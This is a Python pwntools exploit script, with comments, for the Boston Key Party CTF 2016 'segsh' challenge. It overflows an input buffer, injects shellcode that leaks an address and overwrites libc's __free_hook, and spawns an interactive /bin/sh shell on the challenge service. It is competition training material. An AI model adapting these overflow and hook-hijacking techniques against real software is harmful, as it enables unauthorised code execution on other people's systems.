Boston Key Party CTF 2016 segsh (pwn 6pts)
#!/usr/bin/env python
import os
import sys
import time

from pwn import *
# The target is a 32-bit Linux binary; this fixes the word size used by
# pack()/unpack() and the syscall/constant set used by asm() below.
context.update(os='linux', arch='i386')
# Flip on to dump every byte sent and received while debugging the protocol.
# context.log_level = 'debug'

# Endpoint of the live service during the 2016 competition.
HOST = "segsh.bostonkey.party"
PORT = 8888
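# libc shipped with the challenge; preloaded locally so that the symbol
# offsets resolved from it further down also hold for the local process.
LIBC_PATH = './libc-2.19.so'

# Pass 'r' as the first argument to attack the remote service; anything else
# runs the binary locally (the '0' argument is whatever segsh expects -- its
# meaning is not visible from this script).
use_remote = len(sys.argv) > 1 and sys.argv[1] == 'r'
if use_remote:
    conn = remote(HOST, PORT)
else:
    # When an LD_PRELOAD object cannot be opened (e.g. the script is run from
    # the wrong directory) ld.so only prints a warning and continues with the
    # system libc, which would silently invalidate every libc offset computed
    # below.  Fail loudly instead; log.error() raises a PwnlibException.
    if not os.path.isfile(LIBC_PATH):
        log.error("bundled libc not found at %s" % LIBC_PATH)
    # The original also kept a variant without env= for running against the
    # system libc; offsets taken from libc-2.19.so will not match in that case.
    conn = process(['./segsh', '0'], env={'LD_PRELOAD': LIBC_PATH})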
# Words packed into the stage-1 overflow below.  Their meaning is specific to
# the segsh handler protocol and is not visible from this script -- the names
# are the author's; treat them as "what worked", not as a documented ABI.
# NOTE(review): addr_exit is never referenced anywhere in this script.
addr_read = 0x6f
addr_exit = 0x10
addr_buffer = 0x10000
log.info("Pwning")
# The service prompt contains '__'.  Register the built-in 'echo' handler and
# then execute it (command syntax as understood by the target).
conn.recvuntil('__')
conn.send('install -i echo\n')
conn.recvuntil('__')
conn.send('exec -e echo\n')
conn.recvuntil('Input string: ')
# Stage 1: (0x400 - 8) bytes of filler followed by five 4-byte words.  The
# filler length implies a fixed-size input buffer that the five words overrun
# -- TODO confirm the buffer size and what each word overwrites in the binary.
# pack(-0x2000) relies on pwntools packing a negative value as a signed word.
# Written for Python 2 pwntools, where pack() returns str and concatenates with
# the 'A' filler; under Python 3 these would need b'' literals.
exploit = 'A'*(0x400 - 8)
exploit += pack(addr_buffer)
exploit += pack(addr_read)
exploit += pack(0x0)
exploit += pack(-0x2000)
exploit += pack(0x2000)
conn.send(exploit)
# The echo handler sends the input back: 0x40c == (0x400 - 8) + 5 * 4 is
# exactly the payload length, so this drains the echo before stage 2.
_ = conn.recvn(0x40c)
"""
f752f000-f7531000 rwxs 00000000 00:04 74994 /dev/zero (deleted)
f7541000-f7543000 rw-s 00000000 00:04 74995 /dev/zero (deleted)
f7543000-f754b000 rwxs 00014000 00:04 74994 /dev/zero (deleted)
f754b000-f754c000 rw-p 00000000 00:00 0
f754c000-f7553000 r-xp 00000000 00:26 8426 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f7553000-f755b000 rw-s 00000000 00:04 74996 /dev/zero (deleted)
f755b000-f76f4000 r-xp 0000f000 00:26 8426 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f4000-f76f6000 r--p 001a8000 00:26 8426 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f6000-f76f7000 rw-p 001aa000 00:26 8426 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f7000-f76fc000 rw-p 00000000 00:00 0
f76fc000-f76fd000 r-xp 00000000 00:00 0 [vdso]
f76fd000-f76ff000 r--p 00000000 00:00 0 [vvar]
f76ff000-f771f000 r-xp 00000000 08:01 397808 /lib/i386-linux-gnu/ld-2.19.so
f771f000-f7720000 r--p 0001f000 08:01 397808 /lib/i386-linux-gnu/ld-2.19.so
f7720000-f7721000 rw-p 00020000 08:01 397808 /lib/i386-linux-gnu/ld-2.19.so
f7721000-f7725000 r-xp 00000000 00:26 8430 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7725000-f7726000 r--p 00003000 00:26 8430 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7726000-f7727000 rw-p 00004000 00:26 8430 /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7727000-f7748000 rw-p 00000000 00:00 0 [heap]
ffdac000-ffdcd000 rw-p 00000000 00:00 0 [stack]
"""
libc = ELF('./libc-2.19.so')
ofs_libc = 0x20000 - 0x1000 - 0x4000
ofs_segsh = ofs_libc + (0xf7721000 - 0xf754c000)
ofs_rwx = ofs_libc + (0xf752f000 - 0xf754c000)
libc_binsh = next(libc.search('/bin/sh'))
libc_system = libc.symbols['system']
libc_freehook = libc.symbols['__free_hook']
# Stage 2, delivered into the rwx region: a 0x100-byte NOP sled, a short
# leak-and-overwrite stub, a 0x1000-byte NOP sled, then a /bin/sh shellcode.
# The layout matters: the __free_hook value sent at the end points 0x1000
# bytes into this buffer, which -- the stub being far shorter than 0xf00 bytes
# -- lands inside the second sled and slides into shellcraft.sh().
shellcode = '\x90' * 0x100
# The stub does, in order:
#   write(1, ofs_segsh + 0x5060, 4)  -- leak 4 bytes from segsh's writable
#       data page (+0x5000 is the rw-p page in the map above); the script
#       treats them as the address of the rwx buffer.
#   read(0, ofs_libc + __free_hook, 4) -- overwrite __free_hook with 4 bytes
#       supplied by this script.
#   exit(0)  (eax=1 is SYS_exit on i386) -- how this hands control back so a
#       later free() fires the hook is a property of the host binary, not
#       visible here.
# str.format() substitutes the offsets as decimal immediates; at module level
# locals() is the module namespace, so ofs_* and libc_freehook resolve.
# SYS_*/STD*_FILENO are pwntools assembler constants.
shellcode += asm("""
mov eax, SYS_write
mov ebx, STDOUT_FILENO
mov ecx, {ofs_segsh}+0x5060
mov edx, 4
int 0x80
mov eax, SYS_read
mov ebx, STDIN_FILENO
mov ecx, {ofs_libc}+{libc_freehook}
mov edx, 4
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
""".format(**locals()))
shellcode += "\x90"*0x1000
shellcode += asm(shellcraft.sh())
conn.send(shellcode)
# The 4 leaked bytes, decoded as a 32-bit word: presumably the pointer segsh
# keeps to the handler's rwx buffer -- confirm what lives at +0x5060.
rwx_addr = unpack(conn.recvn(4))
log.info('rwx_addr: '+hex(rwx_addr))
# Brief pause before answering the stub's read(); the bytes would presumably be
# buffered anyway, so this is belt-and-braces rather than a proven requirement.
time.sleep(0.1)
# New __free_hook value: a pointer into the second NOP sled.  The next free()
# in the target then runs the /bin/sh shellcode, and interactive() attaches.
conn.send(pack(rwx_addr+0x1000))
conn.interactive()